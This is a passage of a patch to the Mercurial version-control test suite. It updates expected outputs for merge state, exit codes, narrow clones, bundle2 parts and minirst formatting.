5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = 
ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "r") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -453,17 +471,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -512,17 +533,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: 
file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -573,17 +597,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -631,17 +658,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 
(node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -801,11 +831,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -840,11 +872,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -877,11 +911,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -916,11 +952,13 @@ ancestor path: 
file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -963,11 +1001,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -1011,11 +1051,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed diff --git a/tests/test-merge-criss-cross.t b/tests/test-merge-criss-cross.t --- a/tests/test-merge-criss-cross.t +++ b/tests/test-merge-criss-cross.t @@ -540,6 +540,7 @@ other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460) extra: 
ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes extra: other-file (filenode-source = other) $ hg ci -m "merge-deleting-the-file-from-deleted" $ hg manifest @@ -563,6 +564,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes $ hg ci -m "merge-deleting-the-file-from-updated" created new head $ hg manifest @@ -586,6 +588,7 @@ other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes extra: other-file (filenode-source = other) $ hg ci -m "merge-keeping-the-file-from-deleted" created new head @@ -614,6 +617,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes $ hg ci -m "merge-keeping-the-file-from-updated" created new head $ hg manifest @@ -695,6 +699,7 @@ other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): adfd88e5d7d3d3e22bdd26512991ee64d59c1d8f @@ -763,6 +768,7 @@ other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): a4e0e44229dc130be2915b92c957c093f8c7ee3e @@ -886,6 +892,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate 
local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a @@ -923,6 +930,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a diff --git a/tests/test-merge-remove.t b/tests/test-merge-remove.t --- a/tests/test-merge-remove.t +++ b/tests/test-merge-remove.t @@ -95,7 +95,7 @@ $ hg merge bar: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat bar memories of buried pirate treasure diff --git a/tests/test-merge-subrepos.t b/tests/test-merge-subrepos.t --- a/tests/test-merge-subrepos.t +++ b/tests/test-merge-subrepos.t @@ -117,10 +117,17 @@ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved XXX: There's a difference between wdir() and '.', so there should be a status. -`hg files -S` from the top is also missing 'subrepo/b'. +`hg files -S` from the top is also missing 'subrepo/b'. The files should be +seen as deleted (and, maybe even missing? in which case `hg files` should list +it) $ hg st -S + R subrepo/b (missing-correct-output !) $ hg st -R subrepo + R subrepo/b (missing-correct-output !) + +(note: return [1] because no files "match" since the list is empty) + $ hg files -R subrepo [1] $ hg files -R subrepo -r '.' 
diff --git a/tests/test-merge-tools.t b/tests/test-merge-tools.t --- a/tests/test-merge-tools.t +++ b/tests/test-merge-tools.t @@ -377,7 +377,7 @@ merging f some fail message abort: $TESTTMP/mybrokenmerge.py hook failed - [255] + [40] $ aftermerge # cat f revision 1 @@ -1921,7 +1921,7 @@ Binary files capability checking $ hg update -q -C 0 - $ python <<EOF + $ "$PYTHON" <<EOF > with open('b', 'wb') as fp: > fp.write(b'\x00\x01\x02\x03') > EOF @@ -1929,7 +1929,7 @@ $ hg commit -qm "add binary file (#1)" $ hg update -q -C 0 - $ python <<EOF + $ "$PYTHON" <<EOF > with open('b', 'wb') as fp: > fp.write(b'\x03\x02\x01\x00') > EOF diff --git a/tests/test-merge1.t b/tests/test-merge1.t --- a/tests/test-merge1.t +++ b/tests/test-merge1.t @@ -113,7 +113,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] #if symlink symlinks to directories should be treated as regular files (issue5027) @@ -122,7 +122,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] symlinks shouldn't be followed $ rm b $ echo This is file b1 > .hg/b @@ -130,7 +130,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ rm b $ echo This is file b2 > b @@ -144,7 +144,7 @@ $ hg merge 1 --config merge.checkunknown=abort b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] this merge should warn $ hg merge 1 --config merge.checkunknown=warn @@ -188,7 +188,7 @@ $ hg merge 3 --config merge.checkignored=ignore --config merge.checkunknown=abort remoteignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore merging .hgignore 
merging for .hgignore @@ -210,15 +210,15 @@ b: untracked file differs localignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore localignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=abort b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=warn b: replacing untracked file localignored: replacing untracked file diff --git a/tests/test-minirst.py b/tests/test-minirst.py --- a/tests/test-minirst.py +++ b/tests/test-minirst.py @@ -159,6 +159,8 @@ :a: First item. :ab: Second item. Indentation and wrapping is handled automatically. +:c\:d: a key with colon +:efg\:\:hh: a key with many colon Next list: diff --git a/tests/test-minirst.py.out b/tests/test-minirst.py.out --- a/tests/test-minirst.py.out +++ b/tests/test-minirst.py.out @@ -439,6 +439,8 @@ a First item. ab Second item. Indentation and wrapping is handled automatically. +c:d a key with colon +efg::hh a key with many colon Next list: @@ -456,6 +458,9 @@ wrapping is handled automatically. +c:d a key with colon +efg::hh a key with many + colon Next list: @@ -476,6 +481,10 @@ <dd>First item. <dt>ab <dd>Second item. Indentation and wrapping is handled automatically. + <dt>c:d + <dd>a key with colon + <dt>efg::hh + <dd>a key with many colon </dl> <p> Next list: diff --git a/tests/test-mq-qfold.t b/tests/test-mq-qfold.t --- a/tests/test-mq-qfold.t +++ b/tests/test-mq-qfold.t @@ -235,7 +235,7 @@ rollback completed qrefresh interrupted while patch was popped! 
(revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt original message diff --git a/tests/test-mq-qnew.t b/tests/test-mq-qnew.t --- a/tests/test-mq-qnew.t +++ b/tests/test-mq-qnew.t @@ -310,7 +310,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt diff --git a/tests/test-mq-qrefresh-replace-log-message.t b/tests/test-mq-qrefresh-replace-log-message.t --- a/tests/test-mq-qrefresh-replace-log-message.t +++ b/tests/test-mq-qrefresh-replace-log-message.t @@ -191,7 +191,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt Fifth commit message This is the 5th log message @@ -235,7 +235,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] (rebuilding at failure of qrefresh bases on rev #0, and it causes dropping status of "file2") @@ -273,7 +273,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ sh "$TESTTMP/checkvisibility.sh" ==== @@ -315,7 +315,7 @@ rollback completed qrefresh interrupted while patch was popped! 
(revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ sh "$TESTTMP/checkvisibility.sh" ==== diff --git a/tests/test-narrow-clone-no-ellipsis.t b/tests/test-narrow-clone-no-ellipsis.t --- a/tests/test-narrow-clone-no-ellipsis.t +++ b/tests/test-narrow-clone-no-ellipsis.t @@ -26,6 +26,8 @@ dotencode fncache narrowhg-experimental + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-clone-stream.t b/tests/test-narrow-clone-stream.t --- a/tests/test-narrow-clone-stream.t +++ b/tests/test-narrow-clone-stream.t @@ -39,7 +39,7 @@ streaming all changes remote: abort: server does not support narrow stream clones abort: pull failed on remote - [255] + [100] Enable stream clone on the server @@ -68,6 +68,8 @@ fncache (flat-fncache !) generaldelta narrowhg-experimental + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-clone.t b/tests/test-narrow-clone.t --- a/tests/test-narrow-clone.t +++ b/tests/test-narrow-clone.t @@ -42,6 +42,8 @@ dotencode fncache narrowhg-experimental + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -62,15 +64,17 @@ $ cd .. -BUG: local-to-local narrow clones should work, but don't. 
+local-to-local narrow clones work $ hg clone --narrow master narrow-via-localpeer --noupdate --include "dir/src/f10" requesting all changes - abort: server does not support narrow clones - [255] + adding changesets + adding manifests + adding file changes + added 3 changesets with 1 changes to 1 files + new changesets 5d21aaea77f8:26ce255d5b5d $ hg tracked -R narrow-via-localpeer - abort: repository narrow-via-localpeer not found - [255] + I path:dir/src/f10 $ rm -Rf narrow-via-localpeer narrow clone with a newline should fail diff --git a/tests/test-narrow-exchange.t b/tests/test-narrow-exchange.t --- a/tests/test-narrow-exchange.t +++ b/tests/test-narrow-exchange.t @@ -105,7 +105,7 @@ remote: adding file changes remote: transaction abort! remote: rollback completed - remote: abort: data/inside2/f.i@4a1aa07735e6: unknown parent (reporevlogstore !) + remote: abort: data/inside2/f.i@4a1aa07735e673e20c00fae80f40dc301ee30616: unknown parent (reporevlogstore !) remote: abort: data/inside2/f/index@4a1aa07735e6: no node (reposimplestore !) abort: stream ended unexpectedly (got 0 bytes, expected 4) [255] @@ -218,8 +218,8 @@ remote: adding manifests remote: adding file changes remote: added 1 changesets with 0 changes to 0 files (no-lfs-on !) - remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e021835: no match found (lfs-on !) + remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !) remote: transaction abort! (lfs-on !) remote: rollback completed (lfs-on !) - remote: abort: data/inside2/f.i@f59b4e021835: no match found (lfs-on !) + remote: abort: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !) abort: stream ended unexpectedly (got 0 bytes, expected 4) (lfs-on !) 
diff --git a/tests/test-narrow-pull.t b/tests/test-narrow-pull.t --- a/tests/test-narrow-pull.t +++ b/tests/test-narrow-pull.t @@ -78,7 +78,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ hg id 223311e70a6f tip @@ -147,7 +147,8 @@ $ hg clone -q --narrow ssh://user@dummy/master narrow2 --include "f1" -r 0 $ cd narrow2 $ hg pull -q -r 1 + remote: abort: unexpected error: unable to resolve parent while packing '00manifest.i' 1 for changeset 0 transaction abort! rollback completed abort: pull failed on remote - [255] + [100] diff --git a/tests/test-narrow-shallow-merges.t b/tests/test-narrow-shallow-merges.t --- a/tests/test-narrow-shallow-merges.t +++ b/tests/test-narrow-shallow-merges.t @@ -179,7 +179,7 @@ $ hg log -T '{if(ellipsis,"...")}{node|short} {p1node|short} {p2node|short} {desc}\n' | sort - ...2a20009de83e 000000000000 3ac1f5779de3 outside 10 + ...2a20009de83e 3ac1f5779de3 000000000000 outside 10 ...3ac1f5779de3 bb96a08b062a 465567bdfb2d merge a/b/c/d 9 ...8d874d57adea 7ef88b4dd4fa 000000000000 outside 12 ...b844052e7b3b 000000000000 000000000000 outside 2c diff --git a/tests/test-narrow-shallow.t b/tests/test-narrow-shallow.t --- a/tests/test-narrow-shallow.t +++ b/tests/test-narrow-shallow.t @@ -110,9 +110,9 @@ requesting all changes remote: abort: depth must be positive, got 0 abort: pull failed on remote - [255] + [100] $ hg clone --narrow ssh://user@dummy/master bad --include "d2" --depth -1 requesting all changes remote: abort: depth must be positive, got -1 abort: pull failed on remote - [255] + [100] diff --git a/tests/test-narrow-sparse.t b/tests/test-narrow-sparse.t --- a/tests/test-narrow-sparse.t +++ b/tests/test-narrow-sparse.t @@ -61,6 +61,8 @@ fncache generaldelta narrowhg-experimental + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog store diff --git a/tests/test-narrow-trackedcmd.t b/tests/test-narrow-trackedcmd.t --- a/tests/test-narrow-trackedcmd.t +++ b/tests/test-narrow-trackedcmd.t @@ -110,6 +110,8 @@ --clear whether to replace the existing narrowspec --force-delete-local-changes forces deletion of local changes when narrowing + --[no-]backup back up local changes when narrowing + (default: on) --update-working-copy update working copy when the store has changed -e --ssh CMD specify ssh command to use diff --git a/tests/test-narrow-widen.t b/tests/test-narrow-widen.t --- a/tests/test-narrow-widen.t +++ b/tests/test-narrow-widen.t @@ -431,7 +431,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ hg l $ hg bookmarks no bookmarks set diff --git a/tests/test-narrow.t b/tests/test-narrow.t --- a/tests/test-narrow.t +++ b/tests/test-narrow.t @@ -61,7 +61,7 @@ [255] Names with '.' in them are OK. - $ hg clone --narrow ssh://user@dummy/master should-work --include a/.b/c + $ hg clone --narrow ./master should-work --include a/.b/c requesting all changes adding changesets adding manifests @@ -492,3 +492,33 @@ searching for changes looking for unused includes to remove found no unused includes +Test --no-backup + $ hg tracked --addinclude d0 --addinclude d2 -q + $ hg unbundle .hg/strip-backup/*-narrow.hg -q + $ rm .hg/strip-backup/* + $ hg tracked --auto-remove-includes --no-backup + comparing with ssh://user@dummy/master + searching for changes + looking for unused includes to remove + path:d0 + path:d2 + remove these unused includes (yn)? y + looking for local changes to affected paths + deleting data/d0/f.i + deleting data/d2/f.i + deleting meta/d0/00manifest.i (tree !) + deleting meta/d2/00manifest.i (tree !) 
+ $ ls .hg/strip-backup/ + + +Test removing include while concurrently modifying file in that path + $ hg clone --narrow ssh://user@dummy/master narrow-concurrent-modify -q \ + > --include d0 --include d1 + $ cd narrow-concurrent-modify + $ hg --config 'hooks.pretxnopen = echo modified >> d0/f' tracked --removeinclude d0 + comparing with ssh://user@dummy/master + searching for changes + looking for local changes to affected paths + deleting data/d0/f.i + deleting meta/d0/00manifest.i (tree !) + not deleting possibly dirty file d0/f diff --git a/tests/test-obsolete-changeset-exchange.t b/tests/test-obsolete-changeset-exchange.t --- a/tests/test-obsolete-changeset-exchange.t +++ b/tests/test-obsolete-changeset-exchange.t @@ -158,11 +158,10 @@ list of changesets: bec0734cd68e84477ba7fc1d13e6cff53ab70129 listing keys for "bookmarks" - bundle2-output-bundle: "HG20", 4 parts total + bundle2-output-bundle: "HG20", 3 parts total bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload bundle2-output-part: "phase-heads" 24 bytes payload - bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload bundle2-input-bundle: with-transaction bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported adding changesets @@ -174,9 +173,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 1 changesets with 1 changes to 1 files (+1 heads) diff --git a/tests/test-obsolete-distributed.t b/tests/test-obsolete-distributed.t --- a/tests/test-obsolete-distributed.t +++ b/tests/test-obsolete-distributed.t @@ -151,12 
+151,11 @@ list of changesets: 391a2bf12b1b8b05a72400ae36b26d50a091dc22 listing keys for "bookmarks" - bundle2-output-bundle: "HG20", 5 parts total + bundle2-output-bundle: "HG20", 4 parts total bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload bundle2-output-part: "obsmarkers" streamed payload bundle2-output-part: "phase-heads" 48 bytes payload - bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload bundle2-input-bundle: with-transaction bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported adding changesets @@ -170,9 +169,7 @@ bundle2-input-part: total payload size 143 bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 48 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 5 parts total + bundle2-input-bundle: 4 parts total checking for updated bookmarks adding 1 changesets with 1 changes to 1 files (+1 heads) 1 new obsolescence markers diff --git a/tests/test-obsolete.t b/tests/test-obsolete.t --- a/tests/test-obsolete.t +++ b/tests/test-obsolete.t @@ -97,8 +97,10 @@ # rev p1rev p2rev start end deltastart base p1 p2 rawsize totalsize compression heads chainlen 0 -1 -1 0 59 0 0 0 0 58 58 0 1 0 1 0 -1 59 118 59 59 0 0 58 116 0 1 0 - 2 1 -1 118 193 118 118 59 0 76 192 0 1 0 - 3 1 -1 193 260 193 193 59 0 66 258 0 2 0 + 2 1 -1 118 193 118 118 59 0 76 192 0 1 0 (no-zstd !) + 3 1 -1 193 260 193 193 59 0 66 258 0 2 0 (no-zstd !) + 2 1 -1 118 195 118 118 59 0 76 192 0 1 0 (zstd !) + 3 1 -1 195 262 195 195 59 0 66 258 0 2 0 (zstd !) 
$ hg debugobsolete 245bde4270cd1072a27757984f9cda8ba26f08ca cdbce2fbb16313928851e97e0d85413f3f7eb77f C (Thu Jan 01 00:00:01 1970 -0002) {'user': 'test'} @@ -1844,6 +1846,7 @@ ancestor path: file (node bc7ebe2d260cff30d2a39a130d84add36216f791) other path: file (node b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3) extra: ancestorlinknode = b73b8c9a4ab4da89a5a35a6f10dfb13edc84ca37 + extra: merged = yes We should be able to see the log (without the deleted commit, of course) $ hg log -G @ 0:f53e9479dce5 (draft) [tip ] first diff --git a/tests/test-parse-date.t b/tests/test-parse-date.t --- a/tests/test-parse-date.t +++ b/tests/test-parse-date.t @@ -103,43 +103,43 @@ $ hg log -d "--2" abort: -2 must be nonnegative (see 'hg help dates') - [255] + [10] Whitespace only $ hg log -d " " abort: dates cannot consist entirely of whitespace - [255] + [10] Test date formats with '>' or '<' accompanied by space characters $ hg log -d '>' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d '<' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d ' >' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d ' <' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d '> ' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d '< ' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d ' > ' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d ' < ' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d '>02/01' --template '{date|date}\n' $ hg log -d '<02/01' --template '{date|date}\n' diff --git a/tests/test-parseindex2.py b/tests/test-parseindex2.py --- a/tests/test-parseindex2.py +++ b/tests/test-parseindex2.py @@ -117,8 +117,8 @@ ) -def parse_index2(data, inline): - index, chunkcache = 
parsers.parse_index2(data, inline) +def parse_index2(data, inline, revlogv2=False): + index, chunkcache = parsers.parse_index2(data, inline, revlogv2=revlogv2) return list(index), chunkcache diff --git a/tests/test-patchbomb.t b/tests/test-patchbomb.t --- a/tests/test-patchbomb.t +++ b/tests/test-patchbomb.t @@ -2868,7 +2868,7 @@ dest#branch URIs: $ hg email --date '1980-1-1 0:1' -n -t foo -s test -o ../t#test - comparing with ../t + comparing with ../t#test From [test]: test this patch series consists of 1 patches. @@ -2998,7 +2998,7 @@ bad value setting ----------------- - $ echo 'intro=mpmwearaclownnose' >> $HGRCPATH + $ echo 'intro=oliviawearaclownnose' >> $HGRCPATH single rev @@ -3006,7 +3006,7 @@ From [test]: test this patch series consists of 1 patches. - warning: invalid patchbomb.intro value "mpmwearaclownnose" + warning: invalid patchbomb.intro value "oliviawearaclownnose" (should be one of always, never, auto) -f test foo MIME-Version: 1.0 @@ -3047,7 +3047,7 @@ $ hg email --date '1980-1-1 0:1' -v -t '~foo/bar@example.com' -f 'me*@example.com' -r '10' this patch series consists of 1 patches. 
